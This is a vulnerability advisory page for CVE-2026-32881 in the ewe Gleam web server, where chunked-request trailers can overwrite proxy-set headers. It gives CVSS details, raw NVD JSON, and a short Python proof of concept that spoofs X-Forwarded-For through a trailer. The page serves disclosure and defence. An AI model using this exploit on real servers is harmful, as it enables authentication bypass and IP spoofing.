Security Vulnerability Report
中文
CVE-2026-32881 CVSS 5.3 MEDIUM

CVE-2026-32881

Published: 2026-03-20 02:16:36
Last Modified: 2026-03-23 17:03:15
Source: [email protected]

Description

ewe is a Gleam web server. ewe is a Gleam web server. Versions 0.6.0 through 3.0.4 are vulnerable to authentication bypass or spoofed proxy-trust headers. Chunked transfer encoding trailer handling merges declared trailer fields into req.headers after body parsing, but the denylist only blocks 9 header names. A malicious client can exploit this by declaring these headers in the Trailer field and appending them after the final chunk, causing request.set_header to overwrite legitimate values (e.g., those set by a reverse proxy). This enables attackers to forge authentication credentials, hijack sessions, bypass IP-based rate limiting, or spoof proxy-trust headers in any downstream middleware that reads headers after ewe.read_body is called. This issue has been fixed in version 3.0.5.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:vshakitskiy:ewe:*:*:*:*:*:*:*:* - VULNERABLE
ewe < 3.0.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import socket def send_malicious_request(host, port): """ PoC for CVE-2026-32881 Sends a chunked request with a malicious Trailer header to spoof client IP. """ payload = ( "POST / HTTP/1.1\r\n" f"Host: {host}\r\n" "Transfer-Encoding: chunked\r\n" "Trailer: X-Forwarded-For\r\n" "\r\n" "5\r\n" "hello\r\n" "0\r\n" "X-Forwarded-For: 127.0.0.1\r\n" "\r\n" ) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, port)) s.send(payload.encode()) response = s.recv(4096) s.close() print(response.decode()) if __name__ == "__main__": send_malicious_request("127.0.0.1", 8080)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32881", "sourceIdentifier": "[email protected]", "published": "2026-03-20T02:16:36.237", "lastModified": "2026-03-23T17:03:15.093", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "ewe is a Gleam web server. ewe is a Gleam web server. Versions 0.6.0 through 3.0.4 are vulnerable to authentication bypass or spoofed proxy-trust headers. Chunked transfer encoding trailer handling merges declared trailer fields into req.headers after body parsing, but the denylist only blocks 9 header names. A malicious client can exploit this by declaring these headers in the Trailer field and appending them after the final chunk, causing request.set_header to overwrite legitimate values (e.g., those set by a reverse proxy). This enables attackers to forge authentication credentials, hijack sessions, bypass IP-based rate limiting, or spoof proxy-trust headers in any downstream middleware that reads headers after ewe.read_body is called. This issue has been fixed in version 3.0.5."}, {"lang": "es", "value": "ewe es un servidor web Gleam. ewe es un servidor web Gleam. Las versiones 0.6.0 a 3.0.4 son vulnerables a la omisión de autenticación o a encabezados de confianza de proxy falsificados. El manejo de trailers de codificación de transferencia por bloques fusiona los campos de trailer declarados en req.headers después del análisis del cuerpo, pero la lista de denegación solo bloquea 9 nombres de encabezado. Un cliente malicioso puede explotar esto declarando estos encabezados en el campo Trailer y añadiéndolos después del último bloque, lo que hace que request.set_header sobrescriba valores legítimos (por ejemplo, los establecidos por un proxy inverso). Esto permite a los atacantes falsificar credenciales de autenticación, secuestrar sesiones, omitir la limitación de velocidad basada en IP o falsificar encabezados de confianza de proxy en cualquier middleware posterior que lea los encabezados después de que se llame a ewe.read_body. Este problema ha sido solucionado en la versión 3.0.5."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-183"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:vshakitskiy:ewe:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.0.5", "matchCriteriaId": "D14F72FF-5C22-4D38-A4A3-43EC2FCF386D"}]}]}], "references": [{"url": "https://github.com/vshakitskiy/ewe/commit/07dcfd2135fc95f38c17a9d030de3d7efee1ee39", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/vshakitskiy/ewe/commit/94ab6e7bf7293e987ae98b4daa51ea131c2671ba", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/vshakitskiy/ewe/releases/tag/v3.0.5", "source": "[email protected]", "tags": ["Patch", "Product"]}, {"url": "https://github.com/vshakitskiy/ewe/security/advisories/GHSA-9w88-79f8-m3vp", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.